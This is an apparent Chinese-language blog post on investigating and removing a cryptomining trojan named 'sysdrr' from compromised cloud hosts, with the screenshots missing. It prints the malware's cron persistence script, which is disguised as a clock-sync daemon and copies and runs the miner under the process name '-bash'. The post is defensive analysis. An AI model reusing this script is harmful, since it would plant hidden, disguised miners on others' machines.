挖矿木马排查sysdrr

排查问题

  1. 通过云计算平台登录被修改密码的云主机,使用单用户模式强制修改密码
  2. 检查系统日志,木马程序

检查定时任务

image.png

检查登录时间

image.png

检查更换密码时间

image.png

know_hosts(记录的ssh密钥,可用于ssh后门)

特征:所记录ip普遍存在弱密码情况
image.png

爆破次数

image.png

检查防火墙日志

image.png

发现木马

-bash.png
多台主机都被进程名为-bash占用大量CPU资源,多台主机告警,已影响正常业务。

ATT&CK技术行为描述表

image.png

清理木马

  1. 查看进程/pid
    image.png

  2. 清空定时任务
    crontab -l

  3. 查看/var/log/cron
    cd /etc/cron.*
    依次进入每个cron开头的目录,发现他们都共同有一个脚本sync,内容如下:

#!/bin/bash
#
#      Start/Stop the pwnrig clock daemon
#
# chkconfig 2345 90 60
# description: sync clock (GNU System)
cp -f -r -- /bin/sysdrr /usr/bin/-bash 2>/dev/null
cd /usr/bin/ 2>/dev/null
./-bash -c >/dev/null
rm -rf -- -bash 2>/dev/null

找到/bin/sysdrr进程
解除锁定
chattr -i sysdrr
4. 删除挖矿木马
rm -rf sysdrr

最后kill掉-bash进程,观察CPU
更改密码

# 木马 

评论

Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×